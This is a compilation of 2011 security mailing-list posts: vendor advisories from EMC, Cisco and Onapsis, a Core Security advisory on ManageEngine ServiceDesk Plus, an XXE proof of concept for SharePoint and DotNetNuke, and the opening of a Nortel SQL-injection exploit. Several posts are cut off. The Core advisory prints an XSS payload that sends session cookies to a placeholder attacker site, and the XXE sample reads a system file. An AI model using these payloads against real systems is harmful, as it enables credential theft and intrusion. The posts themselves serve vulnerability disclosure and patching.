ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2011-029: Buffer overflow vulnerability in multiple EMC Ionix products. EMC Identifier: ESA-2011-029 CVE Identifier: CVE-2011-2738 Severity Rating: CVSS v2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C) Affected products: Ionix Application Connectivity Monitor (Ionix ACM) 2.3 and earlier Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (Ionix ASAM) 3.2.0.2 and earlier Ionix IP Management Suite (Ionix IP) 8.1.1.1 and earlier Ionix IPv6 Management Suite (Ionix IPv6) 2.0.2 and earlier Ionix MPLS Management Suite (Ionix MPLS) 4.0.0 and earlier Ionix Multicast Manager (Ionix MCAST) 2.1 and earlier Ionix Network Protocol Management Suite (Ionix NPM) 3.1 and earlier Ionix Optical Transport Management Suite (Ionix OTM) 5.1 and earlier Ionix Server Manager (EISM) 3.0 and earlier Ionix Service Assurance Management Suite (Ionix SAM) 8.1.0.6 and earlier Ionix Storage Insight for Availability Suite (Ionix SIA) 2.3.1 and earlier Ionix VoIP Availability Management Suite (Ionix VoIP AM) 4.0.0.3 and earlier Vulnerability Summary: The affected EMC Ionix products contain a buffer overflow vulnerability which can be exploited to cause a denial of service or, possibly, arbitrary code execution. Vulnerability Details: Multiple EMC Ionix products contain a buffer overflow vulnerability. The vulnerability may allow a remote unauthenticated user to send a specially-crafted message over TCP or UDP to cause a denial of service or, possibly, execute arbitrary code. Resolution: The following EMC Ionix products contain resolutions to this issue: EMC Ionix Adapter for Alcatel-Lucent 5620 SAM EMS (ASAM) 3.2.0.3 and later EMC Ionix IP Management Suite (IP) 8.1.2 and later EMC Ionix Service Assurance Management Suite (SAM) 8.1.1 and later EMC Ionix VoIP Availability Management Suite (VoIP AM) 4.0.0.4 and later EMC strongly recommends all customers upgrade at the earliest opportunity. EMC will communicate the fixes for all other affected products as they become available. Regularly check EMC Knowledgebase solution emc274245 for the status of these fixes. Link to remedies: Registered EMC Powerlink customers can download software from Powerlink. For EMC Ionix Software, navigate in Powerlink to Home Support Software Downloads and Licensing Downloads E-I Because the view is restricted based on customer agreements, you may not have permission to view certain downloads. Should you not see a software download you believe you should have access to, follow the instructions in EMC Knowledgebase solution emc116045. Credits: EMC would like to thank Abdul Aziz Hariri working with TippingPoint's Zero Day Initiative (http://www.zerodayinitiative.com) for reporting this issue. For explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends that all customers take into account both the base score and any relevant temporal and environmental scores, which may impact the potential severity associated with particular security vulnerability. EMC Corporation distributes EMC Security Advisories in order to bring to the attention of users of the affected EMC products important security information. EMC recommends all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided as is without warranty of any kind. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. EMC Product Security Response Center security_al...@emc.com http://www.emc.com/contact-us/contact/product-security-response-center.htm -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Cygwin) iEYEARECAAYFAk5v0EYACgkQtjd2rKp+ALxNCACeJTB96gSjSTgsdjUa82XXkSD8 1NkAnR37JUICKVFyZVR2qY0qoSL94Trc =wBdD -END PGP SIGNATURE-
Cisco Security Advisory: CiscoWorks LAN Management Solution Remote Code Execution Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: CiscoWorks LAN Management Solution Remote Code Execution Vulnerabilities Advisory ID: cisco-sa-20110914-lms Revision 1.0 For Public Release 2011 September 14 1600 UTC (GMT) +- Summary === Two vulnerabilities exist in CiscoWorks LAN Management Solution software that could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-lms.shtml Note: Cisco Unified Service Monitor and Cisco Unified Operations Manager are also affected by these vulnerabilities. A separate advisory for Cisco Unified Service Monitor and Cisco Unified Operations Manager is available at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Affected Products = Vulnerable Products +-- CiscoWorks LAN Management Solution software releases 3.1, 3.2, and 4.0 are affected by this vulnerability. Cisco LAN Management Solution versions 3.1 and 3.2 are vulnerable only if the Device Fault Management component (DFM) is installed. Cisco LAN Management Solution versions 4.0 and later are vulnerable regardless of the options selected during installation. Note: Cisco Unified Service Monitor and Cisco Unified Operations Manager are also affected by these vulnerabilities. Products Confirmed Not Vulnerable + No other Cisco products other than the Cisco Unified Service Monitor and Cisco Unified Operations Manager are currently known to be affected by these vulnerabilities. Details === CiscoWorks LAN Management Solution is an integrated suite of management functions that simplifies the configuration, administration, monitoring, and troubleshooting of a network. Two vulnerabilities exist in CiscoWorks LAN Management Solution software that could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Note: These vulnerabilities can be triggered by sending a series of crafted packets to the affected server over TCP port 9002. Both vulnerabilities are documented in Cisco bug ID CSCtn64922 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details + Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn64922 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector -Network Access Complexity -Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level -Official-Fix Report Confidence -Confirmed Impact == Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes === When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. These vulnerabilities have been corrected in Cisco Prime LAN Management Solution Software version 4.1. Cisco Prime LAN Management Solution Software can be downloaded from the following link: http://www.cisco.com/cisco/software/navigator.html?mdfid=283427841i=rm Workarounds === There are no workarounds available to mitigate these vulnerabilities. Additional mitigations that
Cisco Security Advisory: Cisco Unified Service Monitor and Cisco Unified Operations Manager Remote Code Execution Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Cisco Security Advisory: Cisco Unified Service Monitor and Cisco Unified Operations Manager Remote Code Execution Vulnerabilities Advisory ID: cisco-sa-20110914-cusm Revision 1.0 For Public Release 2011 September 14 1600 UTC (GMT) +--- Summary === Two vulnerabilities exist in Cisco Unified Service Monitor and Cisco Unified Operations Manager software that could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Cisco has released free software updates that address these vulnerabilities. There are no workarounds available to mitigate these vulnerabilities. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-cusm.shtml Note: CiscoWorks LAN Management Solution is also affected by these vulnerabilities. A separate advisory for CiscoWorks LAN Management Solution is available at: http://www.cisco.com/warp/public/707/cisco-sa-20110914-lms.shtml Affected Products = Vulnerable Products +-- All versions of Cisco Unified Service Monitor and Cisco Unified Operations Manager prior to 8.6 are affected. To determine the Cisco Unified Service Monitor and Cisco Unified Operations Manager software version navigate to Administration Software Center (Common Services) Software Update. The Software Update page displays the licensing and software version. Products Confirmed Not Vulnerable + No other Cisco products other than the CiscoWorks LAN Management Solution are currently known to be affected by these vulnerabilities. Details === Cisco Unified Service Monitor and Cisco Unified Operations Manager are products from the Cisco Unified Communications Management Suite. They provides a way to continuously monitor active calls supported by the Cisco Unified Communications System. Two vulnerabilities exist in Cisco Unified Service Monitor and Cisco Unified Operations Manager software that could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. These vulnerabilities can be triggered by sending a series of crafted packets to the affected server over TCP port 9002. Both of these vulnerabilities are documented in Cisco bug ID CSCtn42961 ( registered customers only) and have been assigned CVE ID CVE-2011-2738. Vulnerability Scoring Details + Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss * CSCtn42961 - Cisco Unified Service Monitor Remote Code Execution CVSS Base Score - 10 Access Vector -Network Access Complexity -Low Authentication - None Confidentiality Impact - Complete Integrity Impact - Complete Availability Impact - Complete CVSS Temporal Score - 8.3 Exploitability - Functional Remediation Level -Official-Fix Report Confidence -Confirmed Impact == Successful exploitation of these vulnerabilities could allow an unauthenticated, remote attacker to execute arbitrary code on affected servers. Software Versions and Fixes === When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. These vulnerabilities have been corrected in Cisco Unified Service Monitor and Cisco Unified Operations Manager software version 8.6. Cisco Unified Service Monitor and Cisco Unified Operations Manager software can be downloaded from the following link: http://www.cisco.com/cisco/software/navigator.html?mdfid=280110371i=rm Workarounds === There are no workarounds available to mitigate these vulnerabilities. Mitigations
Re: Vulnerabilities in trading and SCADA softwares
On Wed, Sep 14, 2011 at 5:13 AM, fergal.cass...@measuresoft.com wrote: Please take this constructively... The so called vulnerability in ScadaPro does not apply when the Windows firewall is enabled and under normal circumstances the TCP-IP port is not used to communicate with the ScadaPro service. Measuresoft should not stake its security on the hopes that a firewall is running. There will be plenty of folks who will do dumb things with it. In the next release of ScadaPro the TCP/IP port will not be available and instead a secure web service will be available. Also please note these tests were performed independently of Measuresoft on a demo version and without seeking or obtaining any advice from Measuresoft on how to securely deploy ScadaPro. Measuresoft should be deploying securely out of the box. Require the user make manual changes to punch holes in the firewall (or do it for them after they answer a yes/no with no as the default). Secure out of the box is a good thing, even if it causes a few immediate hardships. Jeff
CORE-2011-0506 - Multiples Vulnerabilities in ManageEngine ServiceDesk Plus
Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Multiples Vulnerabilities in ManageEngine ServiceDesk Plus 1. *Advisory Information* Title: Multiples Vulnerabilities in ManageEngine ServiceDesk Plus Advisory ID: CORE-2011-0506 Advisory URL: http://www.coresecurity.com/content/multiples-vulnerabilities-manageengine-sdp Date published: 2011-09-14 Date of last update: 2011-09-14 Vendors contacted: ManageEngine Release mode: User release 2. *Vulnerability Information* Class: Authentication issues [CWE-287], Cross site scripting [CWE-79] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2011-1509, CVE-2011-1510 3. *Vulnerability Description* ManageEngine ServiceDesk Plus is a complete web based and ITIL ready service desk software with integrated asset management developed by ManageEngine, the Enterprise IT Management Software division of Zoho Corporation [1]. The authentication process of ServiceDesk Plus obfuscates user passwords using a trivial and symmetrical algorithm in Javascript code with no secret. Given that user passwords are locally stored in user cookies and having the Javascript code to encrypt and decrypt passwords in a .js file , the authentication process of ServiceDesk Plus can be bypassed allowing an attacker to get usernames+passwords of registered users. Additionally, a cross site scripting vulnerability related to search functions was found. 4. *Vulnerable packages* . ManageEngine ServiceDesk Plus 8.0.0 Professional edition. . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Contact vendor for further information. 6. *Vendor Information, Solutions and Workarounds* Regarding the vulnerability issue in 'SearchSolution' page [CVE-2011-1510], the SDP team has identified this vulnerability [2011-05-16] and it was fixed in SDP 8012, June 2011. ManageEngine did not provide technical information, workaround nor a clear timeline for fixes regarding [CVE-2011-1509]. Please, contact vendor for further information and patches. 7. *Credits* This vulnerability was discovered and researched by Matias Blanco from Core Security Technologies. 8. *Technical Description / Proof of Concept Code* 8.1. *Authentication Weakness* [CVE-2011-1509] User passwords are pseudo encrypted and locally stored in user cookies. This encryption is symmetrical using Caesar Cipher with no salt or secret, having the Javascript code encrypt and decrypt passwords in 'Login.js' file. /- /* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */ ... 12 13 function encryptPassword(textPassword) 14 { 15 var num_out = ; 16 var str_in = escape(textPassword); 17 for(i = 0; i str_in.length; i++) 18 { 19 num_out += str_in.charCodeAt(i) - 23; 20 } 21 return num_out; 22 } 23 -/ /- /* $Id: Login.js,v 1.47 2010/10/05 15:47:53 vidhyadurai Exp $ */ ... 23 24 function decryptPassword(encPassword) 25 { 26 var str_out = ; 27 var num_out = encPassword; 28 for(i = 0; i num_out.length; i += 2) 29 { 30 num_in = parseInt(num_out.substr(i,[2])) + 23; 31 num_in = unescape('%' + num_in.toString(16));// No I18N 32 str_out += num_in; 33 } 34 var textPassword = unescape(str_out); 35 return textPassword ; 36 } 37 -/ So, if the attacker succeeded in trying to steal the cookie, he can easily decrypt it and get the original password. Given that the username is also stored in plaintext in the cookie, this can lead to impersonation and identity theft. 8.2. *Cross-Site Scripting* [CVE-2011-1510] There is a lack of sanitization in the 'searchText' parameter located in the 'SolutionSearch.do' page. An external attacker can obtain the password of an authenticated ManageEngine user by making this request: /- https://[vulnerable_site]/SolutionSearch.do?searchText=';var el=document.createElement('img');el.src='http://[malicious_site]?pass='%2Bdocument.cookie;document.documentElement.appendChild(el);' -/ This request performs an HTTP request to a webserver controlled by the attacker, 'http://[malicious_site]', sending the cookie that includes the predictable password. 9. *Report Timeline* . 2011-05-12: Initial notification to the vendor. Publication date set to June 7th, 2011. . 2011-05-13: The Service Desk team asks Core for a technical description of the vulnerability. . 2011-05-13: Technical details sent to Service Desk team. . 2011-05-16: The Service Desk team notifies they are analyzing the [CVE-2011-1509] issue and it will take them some time to fix it. The issue [CVE-2011-1510] was identified and it will be fixed in SDP 8012, which is expected by the end of May 2011. . 2011-05-23: Core requests to clarify whether the problems will be released altogether or in two release cycles. . 2011-05-27: The Service Desk team notifies the issue [CVE-2011-1510] will be fixed in the upcoming hotfix 8012, which is
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit
?php /* Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration Web Service getSubKeys() Remote SQL Injection Exploit tested against: Microsoft Windows Server 2003 r2 sp2 Microsoft SQL Server 2005 Express download uri: ftp://ftp.avaya.com/incoming/Up1cku9/tsoweb/web1/software/c/contactcenter/crqm/6_5_CS1K_2/Nortel-DVD3-Archive-6_5.iso background: This software installs a Tomcat http server which listens on port 8080 for incoming connections. It exposes the following servlet as declared inside c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\web.xml : .. servlet-mapping servlet-nameEyrAPIConfiguration/servlet-name url-pattern/EyrAPIConfiguration/*/url-pattern /servlet-mapping .. at the following url: http://[host]:8080/EyrAPI/EyrAPIConfiguration/EyrAPIConfigurationIf Vulnerability: without prior authentication, you can reach a web service with various methods availiable, as described inside the associated wsdl, see file: c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\EyrAPIConfiguration.wsdl among them, the getSubKeys() method. Now look at getSubKeys() inside the decompiled c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\com\eyretel\eyrapi\EyrAPIConfigurationImpl.class : .. public String getSubKeys(boolean iterateSubKeys, boolean includeValues, String systemId, String componentId, String sysCompId, String userName) throws RemoteException { StringBuffer xml; ConfigOwnerId configOwnerId; Connection conn; PreparedStatement pStmt; ResultSet rs; PreparedStatement pStmt2; ResultSet rs2; log.info((new StringBuilder()).append(Request getSubKeys: iterateSubKeys=).append(iterateSubKeys).append(, includeValues=).append(includeValues).append(, SystemId=).append(systemId).append(, componentId=).append(componentId).append(, sysCompId=).append(sysCompId).append(, userName=).append(userName).toString()); xml = new StringBuffer(ConfigurationNodeList); configOwnerId = null; conn = null; pStmt = null; rs = null; pStmt2 = null; rs2 = null; try { conn = SiteDatabase.getInstance().getConnection(); if(EyrAPIProperties.getInstance().getProperty(database, MSSQLServer).equalsIgnoreCase(Oracle)) { if(componentId.compareToIgnoreCase() == 0) componentId = *; if(systemId.compareToIgnoreCase() == 0) systemId = *; if(sysCompId.compareToIgnoreCase() == 0) sysCompId = *; if(userName.compareToIgnoreCase() == 0) userName = *; pStmt = conn.prepareStatement((new StringBuilder()).append(SELECT ConfigOwnerID FROM ConfigOwnerView WHERE nvl(ComponentID, '*') = ').append(componentId).append(' AND ).append(nvl(SystemID, '*') = ').append(systemId).append(' AND ).append(nvl(SysCompID, '*') = ').append(sysCompId).append(' AND ).append(nvl(UserName, '*') = ').append(userName).append(').toString()); rs = pStmt.executeQuery(); } else { pStmt = conn.prepareStatement((new StringBuilder()).append(SELECT ConfigOwnerID FROM ConfigOwnerView WHERE ISNULL(CONVERT(varchar(36), ComponentID), '') = ').append(unpunctuate(componentId)).append(' AND ).append(ISNULL(CONVERT(varchar(36), SystemID), '') = ').append(unpunctuate(systemId)).append(' AND ).append(ISNULL(CONVERT(varchar(36), SysCompID), '') = ').append(unpunctuate(sysCompId)).append(' AND ).append(ISNULL(UserName, '') = ').append(unpunctuate(userName)).append(').toString()); rs = pStmt.executeQuery(); } if(rs.next()) { String strConfigOwnerId = rs.getString(1); if(!rs.wasNull()) configOwnerId = new ConfigOwnerId(strConfigOwnerId); pStmt2 = conn.prepareStatement((new StringBuilder()).append(SELECT ConfigGroupID, ConfigGroupName FROM ConfigGroupView WHERE ConfigOwnerID = ').append(configOwnerId.toString()).append(').toString()); for(rs2 = pStmt2.executeQuery(); rs2.next(); xml.append(getSubKeyValuesInc(new Integer(rs2.getInt(1)), iterateSubKeys, includeValues))); } } catch(SQLException e) { String msg = Unable to get subkeys; log.error(msg, e); throw new RemoteException(msg, e); } catch(GenericDatabaseException e) { String msg = Unable to get subkeys; log.error(msg, e); throw new RemoteException(msg, e); } DbHelper.closeStatement(log, pStmt); DbHelper.closeResultSet(log, rs); DbHelper.closeStatement(log, pStmt2); DbHelper.closeResultSet(log, rs2);
XEE vulnerabilities in SharePoint (MS11-074) and DotNetNuke
Hello, Microsoft recently published MS11-074. This bulletin concerns mainly SharePoint (2007 and 2010) but CVE-2011-1892 applies too to Office Groove (client and server), Office Forms Server 2007 and Office Web Apps 2010. The vulnerability is a XML External Entity Reference one, as described in CWE-611 [1]. The vulnerable component is XML Web Part and the following image demonstrates the exploit on a SharePoint 2007 server [2]. DotNetNuke has quietly patched this summer a very similar vulnerability in its XML component (v6.0.0 is OK [3]). As described in Microsoft documentation [4], setting XmlReaderSettings::XmlResolver to NULL is enough to correct this bug. Simple PoC for SharePoint and DotNetNuke : -- XML - !DOCTYPE doc [ !ENTITY boom SYSTEM c:\\windows\\system32\\drivers\\etc\\hosts ] docboom;/doc - -- XSL -- xsl:stylesheet version=1.0 xmlns:xsl=http://www.w3.org/1999/XSL/Transform; xsl:template match=/ xsl:apply-templates/ xsl:value-of select=doc/ /xsl:template /xsl:stylesheet - More details, in French, on my blog : http://goo.gl/hptbj 1: http://cwe.mitre.org/data/definitions/611.html 2: http://www.agarri.fr/docs/shpt-xee.png 3: http://dnnxml.codeplex.com/releases/view/62862 4: http://msdn.microsoft.com/en-us/library/ms172415.aspx Regards, Nicolas Grégoire / Agarri
[Onapsis Security Advisory 2011-015] SAP WebAS webrfc Cross-Site Scripting
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory 2011-015: SAP WebAS webrfc Cross-Site Scripting This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well asexclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business === By exploiting this vulnerability, an internal or external attacker would be able to perform attacks on the Organization's users through weaknesses in the SAP system. Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through social engineering attacks and/or exploit vulnerabilities in their systems in order to take control of them. Risk Level: Medium 2. Advisory Information = - - Release Date: 2011-09-14 - - Last Revised: 2011-09-14 - - Security Advisory ID: ONAPSIS-2011-015 - - Onapsis SVS ID: ONAPSIS-00040 - - Researcher: Mariano Nuñez Di Croce 3. Vulnerability Information == - - Vendor: SAP - - Affected Components: * SAP Web Application Server 7.00 Patch Number 95 ( Check note 1536640 for detailed information on affected releases) - - Vulnerability Class: Cross-Site Scripting (XSS) - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: Yes - - Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-015 4. Affected Components Description === The SAP Web Application Server provides access to many services through a Web engine, called the SAP Internet Communication Framework (ICM). 5. Vulnerability Details == It has been detected that the WEBRFC ICF service suffers from an input validation vulnerability, which can be exploited to perform XSS attacks. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 6. Solution = SAP has released SAP Note 1536640 which provide patched versions of the affected components. The patches can be downloaded from https://service.sap.com/sap/support/notes/1536640 Onapsis strongly recommends SAP customers to download the related security fixes and apply them to the affected components in order to reduce business risks. 7. Report Timeline * 2011-01-25: Onapsis provides vulnerability information to SAP. * 2011-01-25: SAP confirms reception of vulnerability submission. * 2011-05-10: SAP releases SAP Note 1536640 fixing the vulnerability. * 2011-09-14: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit ? the Onapsis Research Labs ? has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis = Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks. Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities. Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over their SAP platform, helping them enforce compliance requirements, decrease financial fraud risks an reduce audit costs drastically. Some of our featured services include SAP Penetration Testing, SAP Gateway
[Onapsis Security Advisory 2011-016] SAP WebAS Malicious SAP Shortcut Generation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Onapsis Security Advisory 2011-016: SAP WebAS Malicious SAP Shortcut Generation This advisory can be downloaded in PDF format from http://www.onapsis.com/. By downloading this advisory from the Onapsis Resource Center, you will gain access to beforehand information on upcoming advisories, presentations and new research projects from the Onapsis Research Labs, as well asexclusive access to special promotions for upcoming trainings and conferences. 1. Impact on Business = By exploiting this vulnerability, an internal or external attacker would be able to perform attacks on the Organization's users through weaknesses in the SAP system. Upon a successful exploitation, he would be able to obtain sensitive information from legitimate users through social engineering attacks and/or exploit vulnerabilities in their systems in order to take control of them. Risk Level: Medium 2. Advisory Information = - - Release Date: 2011-09-14 - - Last Revised: 2011-09-14 - - Security Advisory ID: ONAPSIS-2011-016 - - Onapsis SVS ID: ONAPSIS-00041 - - Researcher: Mariano Nuñez Di Croce 3. Vulnerability Information == - - Vendor: SAP - - Affected Components: * SAP Web Application Server 7.00 Patch Number 95 ( Check note 1556749 for detailed information on affected releases) - - Vulnerability Class: Abuse of designed functionality / Parameter Injection - - Remotely Exploitable: Yes - - Locally Exploitable: No - - Authentication Required: No - - Original Advisory: http://www.onapsis.com/resources/get.php?resid=adv_onapsis-2011-016 4. Affected Components Description = The SAP Web Application Server provides access to many services through a Web engine, called the SAP Internet Communication Framework (ICM). 5. Vulnerability Details === The SAP Web Application Server provides access to many services through a Web engine, called the SAP Internet Communication Framework (ICM). The SHORTCUT ICF service represents a dangerous functionality per-se, as it can be executed anonymously by malicious parties to perform client-side attacks to the organization's end-users. Furthermore, this service contains a parameter injection vulnerability, which provides attackers with further control over the generation of the SAP shortcuts. Further technical details about this issue are not disclosed at this moment with the purpose of providing enough time to affected customers to patch their systems and protect against the exploitation of the described vulnerability. 7. Report Timeline === * 2011-01-25: Onapsis provides vulnerability information to SAP. * 2011-01-25: SAP confirms reception of vulnerability submission. * 2011-04-12: SAP releases sapnote 1556749 fixing the vulnerability. * 2011-09-14: Onapsis releases security advisory. About Onapsis Research Labs === Onapsis is continuously investing resources in the research of the security of business critical systems and applications. With that objective in mind, a special unit ? the Onapsis Research Labs ? has been developed since the creation of the company. The experts involved in this special team lead the public research trends in this matter, having discovered and published many of the public security vulnerabilities in these platforms. The outcome of this advanced and cutting-edge research is continuously provided to the Onapsis Consulting and Development teams, improving the quality of our solutions and enabling our customers to be protected from the latest risks to their critical business information. Furthermore, the results of this research projects are usually shared with the general security and professional community, encouraging the sharing of information and increasing the common knowledge in this field. About Onapsis = Onapsis is the leading provider of solutions for the security of ERP systems and business-critical applications. Through different innovative products and services, Onapsis helps its global customers to effectively increase the security level of their core business platforms, protecting their information and decreasing financial fraud risks. Onapsis is built upon a team of world-renowned experts in the SAP security field, with several years of experience in the assessment and protection of critical platforms in world-wide customers, such as Fortune-100 companies and governmental entities. Our star product, Onapsis X1, enables our customers to perform automated Security Compliance Audits, Vulnerability Assessments and Penetration Tests over their SAP platform, helping them enforce compliance requirements, decrease financial fraud risks an reduce audit costs drastically. Some of our featured services include SAP Penetration